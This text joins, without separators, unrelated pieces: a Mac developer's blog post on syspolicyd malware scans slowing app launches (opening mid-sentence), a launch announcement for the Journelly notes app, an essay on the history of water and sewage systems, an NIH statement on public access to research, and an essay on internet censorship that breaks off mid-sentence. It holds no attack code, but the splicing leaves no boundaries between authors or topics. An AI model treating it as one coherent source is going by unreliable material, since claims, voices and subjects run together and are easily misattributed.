malware checks are triggered by the
dlopen
function to load a dynamic library. These are the framework checks that Oakley mentions; a framework is essentially bundled dynamic library. You can see the series of function calls in the samples of the launching app:
AppleSystemPolicy::waitForEvaluation(
syspolicyd_evaluation*, int, ASPEvaluationInfo*, vnode**, evaluation_results*, long long*, char const*)
It doesn't get any more obvious than
perform_malware_scan_if_necessary
! And the app is literally waiting for the
syspolicyd
evaluation, hence the slow launch.
I tried to explain this to Oakley in the comments of one of his blog posts, but for some strange reason, he refuses to accept my points. In fact, he refuses to take or to read a spindump. At first he claimed it was too difficult for anyone except an "expert" like me, but I simply selected "Spindump" from the action menu in Activity Monitor and then did a text search of the resulting file. (On the other hand, you can control the timing of the spindump more precisely using the
spindump
command-line tool, even specifying that it should wait for a particular app to launch.)
Oakley's position appears to be that the log messages tell him everything that he needs to know, as if a phenomenon doesn't exist unless it's logged. As a computer programmer himself, Oakley ought to know better, because a log message occurs only if the programmer specifically, intentionally writes a logging statement in the program. Not everything that happens on your Mac is magically logged.
Here's Oakley's own theory about the slow launches:
The most likely activity to account for these long checking times is computation of SHA-256 hashes for the contents of each item in the app’s Frameworks folder. Thus, these occasional extremely long launch times are most probably due to time taken ‘evaluating trust’ by computing hashes for protected code in the Frameworks folder in the app bundle, when those hashes have been flushed from their cache.
Oakley seems to be claiming, with no empirical evidence, that Macs have a cache of SHA-256 hashes of all bundled files of all apps that have been launched. But where exactly is this cache??? I've never seen it or heard of such a thing. As far as I can tell, it's pure speculation by Oakley based on nothing but a terse log message:
com.apple.syspolicy.exec Recording cache miss for <private>
Ironically, the references to
com.apple.syspolicy.exec
and
AppleSystemPolicy
in his log messages appear to match quite well with the results of my spindumps. I don't deny that
something
is cached, but I think the evidence suggests that what is cached is the result of a malware scan, which for practical purposes would make a lot more sense than a bunch of hashes. After all, malware definitions are periodically updated for newly discovered malware, which means that the results of previous malware scans would eventually become outdated. Whereas Oakley's theory doesn't make much sense to me. The code signature of executables is
always
checked when the executable is loaded at runtime, so if the app has been modified since the previous launch, that would be detected anyway. Moreover, apps have some protections against modification: App Store apps are owned by the root user, and the App Management feature prevents (or is
supposed to prevent
) notarized apps from unauthorized modification. Thus, I don't even understand the utility of caching SHA-256 hashes of bundled files and periodically recalculating them.
It's also worth noting that Oakley's
discussion of hashing performance
ignores a key detail: the apps that he examines are universal binaries, with both Intel and ARM architectures. This doubles the size of the bundled dynamic libraries. Oakley runs some hashing tests based purely on the sizes of files, but as Apple explains in a
tech note
linked to by Oakley's article, each architecture has its own separate code signature:
The command above includes the
--arch x86_64
option to show the Intel code signature. Without that
codesign
shows the code signature for the architecture on which you run the command. So, if you’re on Apple silicon, you’ll see the Apple silicon code signature.
When an app is launched, it's unlikely that the system would inefficiently spend time checking the code signature of an unused architecture, so whatever checks are performed should be measured against only the half of the sizes of the executables.
Overall, as far as I can tell, there's nothing new here, and Oakley is simply observing the same phenomenon that I already observed last year.
I've always attributed slow Xcode launches to Xcode simply sucking, but I've noticed that the FileMerge app frequently launches slowly too. When this happens, the app can take a dozen bounces in the Dock before finally opening. FileMerge resides in the folder
Xcode.app/Contents/Applications/
within the Xcode bundle and can be opened from the Xcode main menu under the Open Developer Tool submenu. I actually keep FileMerge in my Dock for quick access, because I use FileMerge a lot for diffing files and folders. I finally got fed up with slow launches and decided to investigate by taking a spindump from Activity Monitor. Spindumps are a nice way to see what exactly is consuming resources on your Mac, because they show the "CPU Time" used by each process on your system and each thread in the process.
From the spindump I discovered that the slow launches are caused by the
syspolicyd
process, specifically
DispatchQueue "com.apple.security.syspolicy.yara"
. The backtrace showed
syspolicyd
calling the
yr_rules_scan_file
function. According to
Wikipedia
:
YARA is the name of a tool primarily used in malware research and detection. It provides a rule-based approach to create descriptions of malware families based on regular expression, textual or binary patterns.
Thus, macOS is periodically scanning FileMerge for malware on launch, which causes very slow app launches. I don't know what the exact period is between scans, but rebooting the Mac seems to reset the cache, which made it convenient for me to test the malware scans while writing this blog post (but otherwise makes it extremely inconvenient for me). I've noticed the same
syspolicyd
malware scanning and consequent slow launches with some other apps such as Xcode itself, Google Chrome, and Wireshark. You can even see
syspolicyd
spinning up % CPU in Activity Monitor when the malware scan happens. (In order to catch this, make sure to increase Update Frequency to 1 sec.)
Xcode, Chrome, and Wireshark are very large apps, so it makes sense that a malware scan of them would be slow. However, FileMerge is much smaller, only 2 MB. Why does that take so long? My theory is that
syspolicyd
also scans the launched app's linked libraries. The command
otool -L
in Terminal will show them:
I doubt that the built-in system libraries are scanned for malware, because they reside on a separate cryptographically-signed read-only disk volume. But FileMerge also links to non-system libraries:
@rpath/IDEFoundation.framework/Versions/A/IDEFoundation (compatibility version 1.0.0, current version 22551.0.0)
@rpath/DVTKit.framework/Versions/A/DVTKit (compatibility version 1.0.0, current version 1.0.0)
@rpath/DVTFoundation.framework/Versions/A/DVTFoundation (compatibility version 1.0.0, current version 1.0.0)
@rpath/DeltaFoundation.framework/Versions/A/DeltaFoundation (compatibility version 1.0.0, current version 1.0.0)
@rpath/DeltaKit.framework/Versions/A/DeltaKit (compatibility version 1.0.0, current version 1.0.0)
@rpath/DVTUserInterfaceKit.framework/Versions/A/DVTUserInterfaceKit (compatibility version 1.0.0, current version 1.0.0)
@rpath/libXCTestSwiftSupport.dylib (compatibility version 1.0.0, current version 22516.0.0, weak)
These libraries are located within the Xcode bundle in the
Xcode.app/Contents/SharedFrameworks/
folder.
In my testing, I also saw somewhat slow launching from another app bundled with Xcode, Accessibility Inspector. This app is larger than FileMerge, yet it launches much more quickly. I suspect the reason is that it links to fewer Xcode frameworks:
@rpath/AccessibilitySupport.framework/Versions/B/AccessibilitySupport (compatibility version 0.0.0, current version 0.0.0)
@rpath/DVTFoundation.framework/Versions/A/DVTFoundation (compatibility version 1.0.0, current version 1.0.0)
@rpath/DVTKit.framework/Versions/A/DVTKit (compatibility version 1.0.0, current version 1.0.0)
@rpath/AccessibilityAudit.framework/Versions/B/AccessibilityAudit (compatibility version 1.0.0, current version 1.0.0)
@rpath/AccessibilityAuditDeviceManager.framework/Versions/A/AccessibilityAuditDeviceManager (compatibility version 1.0.0, current version 1.0.0)
In case you're wondering, Apple hasn't exempted Mac App Store apps from malware scanning, not even its own apps. I downloaded Xcode from the
Apple Developer website
rather than from the Mac App Store, but I can see the
syspolicyd
malware scan when launching large Mac App Store apps such as Pages and Numbers. Again, though, I think that the built-in read-only system apps are exempt.
Here's a mystery: I see frequent slow launches and malware scans with Google Chrome but never with
Google Chrome Beta
, despite the fact that the Google Chrome beta app is about the same size as the Google Chrome app. I don't yet have an explanation for the difference in behavior.
By the way, the existence or nonexistence of extended attributes such as
com.apple.quarantine
makes no difference. Removing all the extended attributes from an app bundle doesn't stop the malware scans.
You may remember our friend
syspolicyd
as the process that
phones home to Apple when running unsigned executables
. It was also the culprit in making
Xcode tools slow after reboot
. I guess I should have already known the cause of the slow app launches, but I must have forgotten and/or failed to put two and two together. In any case,
syspolicyd
sucks, and I really wish there were a way to completely disable the malware scanning and allow my apps to always launch quickly. I'm very careful about what I install, and I've never had malware in over twenty years of full-time Mac usage, so I think it's safe to say that for me,
syspolicyd
is security theater, and I'd rather not have to sit through its "play", full of sound and fury, signifying nothing. To be fair, I don't have an issue with malware scanning in the
background
; I just don't want malware scanning to hold up my apps launching in the foreground. Instead of interrupting me and scanning an app during the seconds when I'm launching it—what
should
be a fraction of a second—how about scanning the app during the innumerable seconds when I'm
not
launching it?
Perhaps
disabling System Integrity Protection
disables the malware scan too? I haven't checked this, but it's not really viable for me as a Mac software developer, because I need to test the same runtime environment as my users, otherwise I could write code that works for me but not for my users. I believe that disabling SIP also disables some Apple services on your Mac that are "protected" by DRM (in order to make reverse engineering more difficult).
Addendum
I've now confirmed that disabling SIP does indeed eliminate the
syspolicyd
malware scan. Xcode launches so fast, it's beautiful. I feel like I'm in heaven! I don't think I can go back to the previous hell. I'll live with the consequences, whatever they may be.
On iOS, we're spoiled for choice when it comes to note-taking, journaling, or social media apps. In note-taking alone, I've flip-flopped back and forth between different note-taking and journaling apps. For one reason or another, none would stick. My initial attempt at building such an app faded just the same. That is, until I realized what I really wanted was a cocktail of sorts, combining user experiences from all three kinds. Only then, I finally gained some traction and Journelly was truly born.
I'm happy to share that, as of today, Journelly is generally available on the App Store. Check out
journelly.com
for all app details or just read on...
Like tweeting, but for your eyes only
While bringing social to note-taking was categorically never a goal, we got a thing or two we can draw from social media apps. They make it remarkably easy to browse and just share stuff.
All my previous mobile note-taking attempts failed to stick around almost exclusively because of friction. By bringing a social-media-like feed to my notes and making it remarkably easy to just add and search for things, app stickiness quickly took off.
Of course, these being my personal notes, privacy is non-negotiable. With Journelly being offline by default, combining elements from note-taking, journaling, and social media apps, I came to think of Journelly's experience as "tweeting but for your eyes only".
Is it a notes app? Journaling app? It's whatever you want it to be…
I like how journaling apps automatically bundle timestamps with your entries and maybe additional information like location or even weather details. At the same time, splitting my writing between two apps (quick notes vs. journaling) always felt like unnecessary friction. Even having to decide which app to launch felt like a deterrent.
While my typical Journelly use-case hops between taking notes, journaling, today's grocery shopping list, saving a few links from the web, music, movies—the list goes on… jcs from
Irreal
puts it best: "
Journelly is a bit of a shape shifter
." With just enough structure (but not too much), Journelly can serve all sorts of use-cases.
No lock-in (powered by org plain text)
While I want a smooth mobile note-taking experience, I also don't want my notes to live in a data island of sorts. I'm a fan of plain text. I've been writing my notes and blog posts at
xenodium.com
using
Org
plain text for well over a decade now, so my solution naturally had to have some plain text thrown at it.
Journelly stores entries using
Org
markup for now, but
Markdown
is coming too. Interested in Markdown support?
Please reach out
. The more requests I receive, the sooner I'll get it out the door. Oh, and since we're talking Markdown, I also launched
lmno.lol
, a Markdown-powered blogging service (minus the yucky bits of the modern web). Custom domains are welcome too. My
xenodium.com
blog runs off
lmno.lol
.
Having shown you all of that, this is all just cherry on the implementation cake. You need not know anything about markups to use Journelly. Just open the app and start writing.
iCloud syncing (optional)
While Journelly is offline by default, you may optionally sync with other devices via iCloud.
Folks have reported using
Working Copy
,
Sushitrain
, or
Möbius Sync
for syncing, though your mileage may vary. As of v1, I can only offer iCloud as the officially supported provider.
There's little structure enforced on Journelly entries. Write whatever you want. If you want some categorization, sprinkle entries with your favorite hashtags. They're automatically actionable on tap, enabling quick searches in the future.
Thank you beta testers!
Nearly 300 folks signed up to
Journelly's TestFlight
. Thank you for testing, reporting issues, and all the great suggestions. While many of your feature requests made it to the launch, I've had to defer quite few to enable the v1 release. The good news is I now have a healthy backlog I can work on to bring features over time.
Support indie development
The
App Store
is a crowded place. Building ✨sustainable✨ iOS apps is quite the challenge, especially when doing right by the user. Journelly steers clear of ads, tracking, distractions, bloat, lock-in, and overreaching permissions. It embraces open formats like
Org
markup, safeguarding the longevity of your data.
Johnny Appleseed used to be a staple character in old American children’s books. A ragged vagabond in the early nineteenth century, Appleseed traveled barefoot through the forest, wore coffee sacks with cut-out holes for his arms and head, and planted thousands upon thousands of apple trees for the first settlers in Pennsylvania, Ohio, Illinois, and Indiana.
“Appleseed” was a nickname; he was born as John Chapman. As a young man, Chapman became convinced that Christianity had lost its way and needed to be restored by a new church. He worked in an orchard, fell in love with apples, and devoted the rest of his long life to wandering through the newly occupied Middle West, passing out tracts for the new church — and establishing apple orchards, selling the saplings for a few pennies each.
Although a dozen or so Johnny Appleseed festivals are still celebrated, he is less likely to be found in children’s books today. That may be because historians realized that Appleseed was not just a kindly religious eccentric who went around planting apples so that Midwesterners could have fresh, healthy fruit. Instead, he was a vital part of village infrastructure: his apples were mostly not for eating, they were for making hard cider.
Typical hard cider has an alcohol level of about five percent, enough to kill most bacteria and viruses. Many settlers drank it whenever possible, because the water around them was polluted — sometimes by their own excrement, more commonly by excrement from their farm animals. Cider from Appleseed’s apples let people avoid smelly, foul-tasting water. It was a public health measure — one that, to be sure, let some of its users pass the day in a mild alcoholic haze.
For as long as our species has lived in settled communities, we have struggled to provide ourselves with water. If modern agriculture, the subject of
the previous article in this series
, is a story of innovation and progress, the water supply has all too often been the opposite: a tale of stagnation and apathy. Even today, about
two billion
people, most of them in poor, rural areas, do not have a reliable supply of clean water —
potable
water, in the jargon of water engineers. Bad water leads to the death every year of
about a million people
. In terms of its immediate impact on human lives, water is the world’s biggest environmental problem and its worst public health problem — as it has been for centuries.
On top of that, fresh water is surprisingly scarce. A globe shows blue water covering our world. But that picture is misleading: 97.5 percent of the Earth’s water is salt water — corrosive, even toxic. The remaining 2.5 percent is fresh, but the great bulk of that is unreachable, either because it is locked into the polar ice caps, or because it is diffused in porous rock deep beneath the surface. If we could somehow collect the total world supply of rivers, lakes, and other fresh surface water in a single place — all the water that is easily available for the eight billion men, women, and children on Earth — it would form
a sphere just 35 miles in diameter
. Adding in reachable groundwater would add some miles to that sphere, but not enough to dramatically alter the fact that our water-covered globe just doesn’t have that much fresh water we can readily get our hands on.
Couldn’t we make more? It is true that salt water can be converted into fresh water. Desalination, as the technique is called, most commonly involves forcing water through extremely fine membranes that block salt molecules but let water molecules, which are smaller, pass through. The Western hemisphere’s biggest desalination plant, in Carlsbad, California, is a technological marvel, pumping out about 50 million gallons of fresh water every day, about 10 percent of the water supply for nearby San Diego. But it also cost about $1 billion to build, uses as much energy as a small town, and dumps 50 million gallons per day of leftover brine, which has attracted numerous lawsuits. For now, in most places, supplying fresh water will have to be done the way it has always been done: digging a well or finding a river, lake, or spring, then pumping or channeling the water where needed.
The Problem
No matter what its source, almost every way that humans use water makes it unfit for later use. Whether passed through an apartment dishwasher or a factory cooling system, a city toilet or a rural irrigation system, the result is an undrinkable, sometimes hazardous fluid that must be cleaned and recycled. When water engineers say, “We need clean water,”
clean
is the part they worry about.
Clean water is a necessity for more than just drinking. Almost
three-quarters
of human water use today is for agriculture, especially irrigation (out of all the world’s food, about
40 percent
is grown on irrigated land). Another fifth of water use is by industry, where water is both a vital raw ingredient and a cleaning and cooling agent. Households are responsible for just one-tenth of global water consumption, but most of that is used for cleaning: washing dishes, washing clothes, washing people, washing away excrement.
Providing the clean water needed for all these purposes entails four basic functions:
Finding, obtaining, and purifying the water that goes into the system;
Delivering it to households and businesses;
Cleaning up the water that leaves those homes and businesses; and
Maintaining the network of pipes, pumps, and other structures responsible for the previous three functions.
Simple to describe, these tasks are hair-pullingly complex on the ground. The challenge of building and operating a water system that can supply the daily onslaught of morning flushes and showers while not flooding people who turn on their taps at low-use times is the sort of thing that keeps engineers awake at night. Even simple water-supply pipes are more complex than one might think. Water is heavy and not very compressible. When it travels through a pipe, it can acquire a lot of momentum. When multiple water users close valves or stop pumps, the momentum can create a shockwave in the pipe. In big pipelines, this “water hammer” is like a freight train smashing into a wall — it can damage the pipeline or tear apart equipment. Special slow-closing valves and pumps are required.
Difficult as these technical issues are, they have been largely understood since biblical times and before. By far the biggest and most frustrating obstacle is instead what social scientists call “governmentality” — and what everybody else calls corruption, inefficiency, incompetence, and indifference.
The evidence is global and overwhelming. English cities lose
a fifth of their water supply
to leaks; Pennsylvania’s cities lose
almost a quarter
; cities in Brazil lose
more than a third
. So much of India’s urban water is contaminated that the cost of dealing with the resultant diarrhea is fully
2 percent
of the nation’s gross domestic product. Texas loses so much water that just fixing the leaks could provide
enough water
for all of its major cities’ needs in the near future. All fifty states and all U.S. territories are plagued by
water systems with lead pipes
, which can leak dangerous lead into their water. The Mountain Aquifer between Israel and Palestine is the primary source of groundwater for both. In an atypical act of collaboration, both are overusing and polluting it. And so on.
Ancient Solutions
Water systems and their problems are as old as the first cities, and possibly older. The urban complex of Mohenjo-Daro, on the banks of Pakistan’s Indus River, arose about 2600
b.c.
, around the time that Egyptians were erecting the pyramids. Mohenjo-Daro was the biggest city in what archaeologists call the Harappan or Indus Valley civilization. Most of the citizenry lived in the “lower town,” a Manhattan-like grid of streets and boulevards faced by low brick buildings. Atop a high platform of mud bricks to its west was the “upper town,” sometimes romantically called the Citadel, a civic center that held relatively few people. Remarkably, there is little evidence that people in the upper town were richer or more powerful than those in the lower — Mohenjo-Daro seems to have been a surprisingly egalitarian place.
Water control was at its heart. Some 700 public wells dotted the lower city, many of them
sixty feet deep
. Cylindrical and lined with bricks and plaster, these wells created an urban water supply with a capacity and safety level that would not be matched until the modern era. Its source was snowfall and rainfall in the foothills of the Himalayas that had percolated into the soil, becoming groundwater; during its journey from the heights to the ground beneath Mohenjo-Daro, the water passed through layers of rock and sand that filtered out contaminants.
Mohenjo-Daro had an equally impressive system for flushing dirty water out of the city. Beneath both upper and lower cities was an intricate arrangement of drains, most of them narrow trenches in the streets, usually about two feet deep and covered by bricks that could be removed for service. Many drain lines had “settling pools” — basin-like areas in which the water would slow down enough to deposit some of the sediment it carried. In a rudimentary form of sewage treatment, the pools would be emptied out and the deposited sediment probably used for fertilizer.
In the upper town was the Great Bath, a forty-foot-long, eight-foot-deep sunken pool in the middle of a plaza that archaeologists have called humankind’s first artificial swimming pool. In the lower town, almost every house had a similar, smaller replica — a square, shallow basin, perhaps three feet on a side, against an outside wall. The basin sloped toward a floor-level outlet in the wall that drained into an outside “catchment vessel,” a kind of ceramic tub, which in turn led to a public drain (or, in some cases, could be dumped into one). By the bathing area was a toilet — a seat with a hole — that also deposited into the catchment vessel. Partly because linguists have not yet deciphered the Indus Valley script, details of daily existence in Mohenjo-Daro remain unknown. But bathing in clean water was clearly a focus of the city’s social life.
The Great Bath, possibly humanity’s first artificial swimming pool, in Mohenjo-Daro, Pakistan
Mike Goldwater / Alamy
The reason to describe this long-ago city in such detail is that the technology deployed in the Indus Valley would not be surpassed, or even much changed, until just a few centuries ago. Imperial Rome, at its height likely the world’s biggest, most sophisticated city, had a water system that would have been familiar to people from Mohenjo-Daro, more than two thousand years before. Like its predecessors, Rome took advantage of gravity to make water flow from springs and rivers in the high hills outside the city into public facilities on the streets below. Perhaps the biggest difference was that the water from the hills came into the city on a series of aqueducts — bridge-like constructions that channeled water across valleys.
Rome, like Mohenjo-Daro, had a web of sewers that channeled away stormwater and wastewater. In Rome, that effluent flowed into a giant pipe called the Cloaca Maxima, which conducted the water into the Tiber River. Traveling downriver, the solid particles in the waste would drop to the riverbed; whatever remained would be diluted by flowing into the sea. The Roman model was replicated around the world for centuries. Louis XIV’s Paris dumped its waste into the Seine River; James Madison’s Washington, D.C., into the Potomac; Queen Victoria’s London into the Thames.
Despite having been employed for thousands of years, this method had an obvious drawback: it polluted the river, creating a terrible stench and making people sick downstream. Actually trying to clean up sewage, as opposed to sluicing it elsewhere, was rarely considered. Sometimes governments used wastewater for irrigation, a practice that, again, goes at least as far back as Mohenjo-Daro. In East Asia, excrement-filled water was often dispatched to “sewage farms,” which used the water as fertilizer. In 1531 the first European sewage farm opened in Bolesławiec, in what is now western Poland. The idea was slow to spread; France and Germany did not begin operating them until the nineteenth century.
Great Stink
The Industrial Revolution led to a dramatic increase in water use in urban factories. The resulting waste led to an equally dramatic decrease in water quality that fostered disease, especially cholera. Cholera is caused by drinking water contaminated with the bacterium
Vibrio cholera
e
; sufferers have diarrhea so violent that it can kill them within hours if untreated. London, capital of what was then the world’s biggest, richest, most technologically advanced empire, experienced cholera epidemics in 1832–33, 1848–49, and 1853–54. Each time, thousands died.
During the 1854 epidemic a physician named John Snow traced the outbreak to a single contaminated city well. Politicians thundered against filth and disease but did next to nothing. They didn’t even keep the well closed. Four years later, hot weather reduced the flow of the Thames, which caused raw sewage and industrial waste to pile up on the banks. So overwhelming was the Great Stink of 1858 that Parliament was forced to act. Clamping scented handkerchiefs over their faces to stifle the smell, legislators finally voted to extend, enclose, and revamp the city sewer system.
Aiding London’s municipal engineers in the city’s belated upgrade was the first major innovation in water treatment for thousands of years: the pump. Although pumps are known from as far back as ancient Greece, they were not deployed on a large scale until about 1700, the beginning of the industrial era. Big pumps powered by coal-burning engines allowed London and many other cities to channel huge quantities of wastewater away from the city.
As a rule, pumping was deployed not to treat sewage but simply to flush it somewhere else. Cities piped the effluent into a river, lake, or shoreline further from the city — moving the problem, rather than solving it. But as urban populations grew, shunting away pollution became ever more difficult, both because the volume increased and because the land and waters around the city rose in value and their owners no longer wanted to accept it. The measures adopted by London after the Great Stink proved insufficient, as did other, similar measures elsewhere. Between 1898 and 1915, a British royal commission investigated the sewage problem. In a
series of reports
, it set the standards for most modern water systems.
One of its most historically significant recommendations was to separate storm water and sewage. Sewers have two main functions: carrying away storm water so neighborhoods don’t flood, and carrying away waste so they won’t be smelly and disease-ridden. Ancient and medieval sewer systems mixed both tasks, which meant that cities were covered in filth when heavy rains made sewers overflow into neighborhoods. Separating the two functions would not only keep the streets cleaner during storms but also reduce the burden on sewage-treatment systems.
How to Turn Sewage into Clean Water
Today, sewage treatment occurs in three steps, in an ascending ladder of squeamishness. The first,
primary
treatment, is an update to the old method of dumping effluent into rivers and lakes, except that it involves channeling diluted sewage into large tanks or basins. (Often it is passed through a screen along the way, which removes big, floating objects like sticks that might damage equipment.) Developed by several European sanitary engineers in the mid–nineteenth century, primary treatment is an advanced version of the settling pools in Mohenjo-Daro. As the water sits in the basin, the most disagreeable solids settle to the floor or float on the surface. Afterward, the muck is removed, usually by big paddles that sweep over the surface and floor of the tank, and then buried in landfills. In a few places, it is still spread on land and converted to fertilizer. Occasionally it is burned.
Secondary
treatment, the next step, was invented by three researchers at the University of Manchester: Gilbert Fowler, Edward Ardern, and William Lockett. Now almost forgotten, the names of Fowler, Ardern, and Lockett should be emblazoned on city gates, for secondary treatment has made cities around the world into far more salubrious places. Nobel prizes have been awarded for advances far less consequential.
Primary treatment does not remove fine sediments — the water is often still vile. In a set of experiments in 1913, Fowler, Ardern, and Lockett added bacteria-rich sludge to the water from primary treatment and aerated it in much the same way that aquarium owners aerate their fish water with a bubbler. Aeration creates high oxygen levels in the water that encourage the bacteria to consume the remaining organic matter. After eating their fill, the researchers discovered, the bacteria sink to the bottom, where they can be scraped away for reuse. The recycling process is called, unromantically, “activated sludge.”
The water produced from secondary treatment looks and smells clean but still may not be potable, because neither primary nor secondary treatment eliminates all noxious chemicals and microorganisms. In a final step,
tertiary
treatment, the water is filtered again, for example by passing it through big towers full of sand. Then, depending on the facility, a variety of techniques are deployed to make the water potable. These include sprinkling chemicals in the water to remove nitrogen and phosphorus, adding chlorine or beaming ultraviolet radiation to kill remaining microorganisms, or forcing the water through a super-fine membrane that allows water molecules to pass through but not dissolved contaminants. All of these are costly, which is why governments typically have resisted them until forced to adopt them by public pressure.
These systems clean up water that people have used. Analogous systems are required to make water from wells, rivers, lakes, and so on potable. Different systems are used for different water sources in different places, but typically the incoming water must be filtered, clarified, and disinfected. And these steps, too, are costly, and have their own history of governmental foot-dragging.
The Hyperion Water Reclamation Plant in Los Angeles goes back to 1894, when it dumped raw sewage into the beach water. A screen to catch solid waste was added in 1925, and secondary treatment in 1950. Plans have been drawn up for revamping the plant to recycle over 200 million gallons of waste water per day into potable water by 2035, for an estimated project cost of up to $5 billion.
Aerial Archives / Alamy
A Looming Disaster
Journalists have an expression: MEGO, meaning My Eyes Glaze Over. It stands for worthy and important subjects that people regard as too dull to think about. Water supply seems to be the essence of MEGO. Fixing urban networks is so expensive, time-consuming, and invisible to the public that governments historically have been unwilling to pay attention unless forced by disaster. Sometimes they have tried to hand the problem to private industry, but water is so obviously a public concern that in many cases the citizenry has resisted. All too often, the result has been systems that stagger along at barely satisfactory levels.
Cairo, Buenos Aires, and San Antonio; Dhaka, Istanbul, and Port-au-Prince; Miami, Manila, Monrovia, Mumbai, and Mexico City — all have greatly expanded in recent decades, and all have failed to keep up with the demand for clean, plentiful water. The statistics are stark. At a global scale,
40 percent
of waste water is dumped without being safely treated, and 24 percent without being treated at all, which leaves about
2 billion
people using water that can be polluted by feces, chemicals, or other contaminants.
The United States is better off than many places, but it has its own problems. Big public programs in the 1960s and 1970s gave us water systems whose cleanliness and reliability would have seemed like miracles in Johnny Appleseed’s day. The system our forebears constructed
is vast
: approximately 150,000 public drinking-water systems and more than 16,000 public waste-water treatment systems. These serve roughly 80 percent of the U.S. public. (The remainder have private wells and septic tanks, which are typically inspected by local governments when installed.)
But now these systems need to be rebuilt. Growing demand, increasingly severe droughts, and, above all, aging infrastructure are testing their limits. Almost
half a million miles of pipe
in North America is nearing the end of its useful life and will need to be replaced soon. Equally in need of upgrades are the thousands of treatment plants built in the 1970s. The U.S. Environmental Protection Agency estimates that maintaining the nation’s drinking water and waste water infrastructures will cost at least
$1.2 trillion
over the next twenty years. Water experts
have been warning
about these looming problems for decades. But nothing like the required sums has been committed. History suggests that the systems will not be maintained until there are several disasters. But the disasters could be avoided if voters understood the importance of their water supply, and made clean water a priority.
I am excited to announce that one of my first actions as NIH Director is pushing the accelerator on policies to make NIH research findings freely and quickly available to the public. The 2024 Public Access Policy, originally slated to go into effect on December 31, 2025,
will now be effective as of July 1, 2025
.
To be clear, maximum transparency regarding the research we support is our default position. Since the release of NIH’s 2008 Public Access Policy, more than 1.5 million articles reporting on NIH-supported research have been made freely available to the public through PubMed Central. While the 2008 Policy allowed for an up to 12-month delay before such articles were required to be made publicly available, in 2024, NIH revised the Public Access Policy to remove the embargo period so that researchers, students, and members of the public have rapid access to these findings.
NIH is the crown jewel of the American biomedical research system. However, a recent
Pew Research Center study
shows that only about 25% of Americans have a “great deal of confidence” that scientists are working for the public good. Earlier implementation of the Public Access Policy will help increase public confidence in the research we fund while also ensuring that the investments made by taxpayers produce replicable, reproducible, and generalizable results that benefit all Americans.
Providing speedy public access to NIH-funded results is just one of the ways we are working to earn back the trust of the American people. Trust in science is an essential element in Making America Healthy Again. As such, NIH and its research partners will continue to promote maximum transparency in all that we do.
Jay Bhattacharya, M.D., Ph.D.
Director, National Institutes of Health
Digital Dams That Don't Hold: Why Internet Censorship Fails as Technical Policy
Throughout history, governments and authorities have tried to control the flow of information. From the burning of the Library of Alexandria and the Catholic Church’s Index of Forbidden Books to Nazi book burnings and the Soviet Union’s censorship apparatus, controlling what people can read, share, and discuss has been a consistent impulse of those in power. In the digital age, this age-old impulse manifests as internet censorship—but with a crucial difference: the internet was fundamentally designed to resist it.
When authorities attempt to censor the internet, they’re effectively trying to plug holes in a digital dam with their fingers. The information doesn’t stop—it simply finds another path. This isn’t just a metaphor; it’s the technical reality of how the internet was architected, with protocols specifically designed to route around damage and disruption. As internet pioneer John Gilmore famously stated:
“The internet interprets censorship as damage and routes around it.”
Recent events in Spain and India highlight this technological reality in striking ways.
In Spain, LaLiga, the top Spanish professional football division, secured a court order allowing them to unilaterally block IP addresses they believe are being used to pirate livestreams of matches. Rather than targeting specific infringing services, LaLiga took the extreme step of blocking Cloudflare’s entire IP range when the games are live—affecting thousands of legitimate websites that happen to use Cloudflare’s infrastructure over the weekend.
Cybernews
- Spain’s fight against La Liga streaming pirates hurts thousands of innocent sites
Spanish authorities complied with this overbroad implementation without pushback, demonstrating how easily targeted enforcement can expand into widespread disruption. In response, Cloudflare had launched a legal action against LaLiga for blocking these IPs, although the ban was still upheld by the Spanish authorities.
LaLiga
- Commercial Court No. 6 of Barcelona upholds the judgment issued in favour of LALIGA
In India, the Karnataka High Court directed the government to block ProtonMail entirely because a single Delhi-based design firm allegedly received emails with obscene content from a ProtonMail address.
TechCrunch
- Indian court orders blocking of Proton Mail
This isn’t even the first such attempt in India—in early 2024, Tamil Nadu police requested a nationwide ProtonMail block after schools received bomb threats via the service. When Swiss authorities intervened in that case, ProtonMail aptly observed that “Blocking access to Proton Mail simply prevents law-abiding citizens from communicating securely and does not prevent cybercriminals from sending threats with another email service, especially if the perpetrators are located outside of India.”
These cases exemplify a fundamental misunderstanding of how the internet works—and why digital censorship is technically doomed to fail.
[link]
The Continuing Pattern of Failed Censorship
The cases from Spain and India highlighted in the introduction exemplify a broader technical reality that has remained consistent throughout the internet’s history. While the specifics vary—from blocking infrastructure providers like Cloudflare to censoring communication platforms like ProtonMail—the underlying technical dynamics remain identical.
These cases aren’t isolated incidents—they’re emblematic of a persistent technological misunderstanding. Similar scenarios have played out consistently across different countries and contexts, with remarkably consistent technical outcomes. From Turkey’s YouTube blocks to Russia’s Telegram ban, the technical results follow a predictable pattern regardless of the political or social context in which they occur. To understand why these censorship attempts inevitably fail, we need to examine the fundamental architectural features of the internet that make censorship technically problematic, regardless of context or justification.
[link]
The Technical Reality: Four Fundamental Flaws in Internet Censorship
Internet censorship faces several fundamental technical challenges that make it both ineffective and harmful, regardless of the context in which it’s implemented:
[link]
1. Digital Detours: Why Technical Circumvention is Inevitable
Any moderately technical user can bypass most blocking mechanisms using:
Virtual Private Networks (VPNs)
The Tor network
Alternative DNS servers
Proxy services
Mirror sites
According to a 2017 Global Web Index study
Global Web Index
- VPN Usage Study (2017)
, approximately 30% of internet users worldwide have used VPNs, with that number rising to over 60% in countries with more internet restrictions. In countries with significant censorship, these circumvention tools become common knowledge, rendering blocks largely symbolic rather than effective.
[link]
2. The Streisand Effect: When Censorship Becomes Publicity
Named after a 2003 incident where Barbara Streisand’s attempts to suppress photographs of her Malibu home resulted in those images being seen by millions, the infamous “Streisand Effect” describes the unintended consequence where efforts to hide or censor information lead to its wider dissemination.
This phenomenon has been extensively studied by internet researchers. When authorities block access to a service like ProtonMail or a website, several counterproductive effects occur:
Immediate attention amplification:
News of the block spreads quickly through social media and tech publications, drawing attention to the very service authorities wanted to suppress.
Search interest spike:
Research from the Berkman Klein Center for Internet & Society at Harvard University found that Google searches for blocked content typically increase by 200-300% in the days following blocking actions.
Harvard
- New Berkman Klein Center study examines global internet censorship
Technical education:
Blocking motivates users to learn circumvention techniques they might never have explored otherwise, creating a more technically sophisticated user base.
Martyrdom effect:
Blocked services often gain sympathy and support, particularly from digital rights advocates and privacy-conscious users who view them as victims of censorship.
The Spanish Cloudflare block and Indian ProtonMail block are likely to repeat this pattern. For example, when Turkey blocked Twitter in 2014, Turkish Twitter usage actually
increased by 138%
